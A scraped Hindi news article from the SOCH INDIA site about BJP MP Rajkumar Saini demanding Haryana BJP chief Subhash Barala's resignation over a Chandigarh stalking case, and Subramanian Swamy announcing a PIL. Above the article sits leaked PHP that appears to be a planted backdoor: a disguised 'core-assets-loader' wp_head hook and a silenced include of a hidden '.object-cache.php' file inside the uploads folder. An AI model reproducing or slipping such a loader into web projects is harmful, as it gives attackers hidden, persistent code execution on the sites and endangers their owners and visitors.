add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अपनों से ही घिरी BJP, सांसद ने मांगा बराला का इस्तीफा, कोर्ट जाएंगे स्वामी – SOCH INDIA
Menu

राजनीति
अपनों से ही घिरी BJP, सांसद ने मांगा बराला का इस्तीफा, कोर्ट जाएंगे स्वामी

nobanner

चंडीगढ़ छेड़खानी मामले में अब बीजेपी के अंदर से ही हरियाणा बीजेपी के अध्यक्ष सुभाष बराला के खिलाफ आवाज उठी है. कुरुक्षेत्र से बीजेपी सांसद राजकुमार सैनी ने कहा कि किसी का पीछा करना, हाथ मारकर गाड़ी रोकना या अपहरण की कोशिश करना एक गंभीर मामला है, इसको लेकर सख्त कार्रवाई होनी चाहिए. उन्होंने कहा कि लड़की ने इस मामले में हिम्मत दिखाई है वरना 90 फीसदी लड़कियां मामले को लेकर सामने नहीं आती हैं.

उन्होंने कहा कि विपक्ष के मुंह खोलने से पहले ही सुभाष बराला को इस्तीफा दे देना चाहिए. उन्होंने कहा कि केंद्रीय नेतृत्व इस पर क्या फैसला करेगा ये मुझे नहीं पता लेकिन यह मेरी राय है कि उन्होंने बिना किसी देरी के इस्तीफा दे देना चाहिए. उन्होंने कहा कि जैसे संस्कार परिवार से मिले होंगे, वो वैसा ही कर्म कर रहा है. बेटी बचाओ और बेटी पढ़ाओ पर ये एक प्रकार का धब्बा है.

बीजेपी नेता सुब्रमण्यन स्वामी ने भी इस मामले पर ट्वीट किया. उन्होंने लिखा कि चंडीगढ़ में आईएएस ऑफिसर की बेटी के साथ छेड़छाड़ के मामले में वह PIL दायर करेंगे. उन्होंने कहा कि चंडीगढ़ पुलिस की रीढ़ की हड्डी नहीं है, उसकी सर्जरी की आवश्यकता है, इसलिए मैं PIL फाइल करने जा रहा हूं.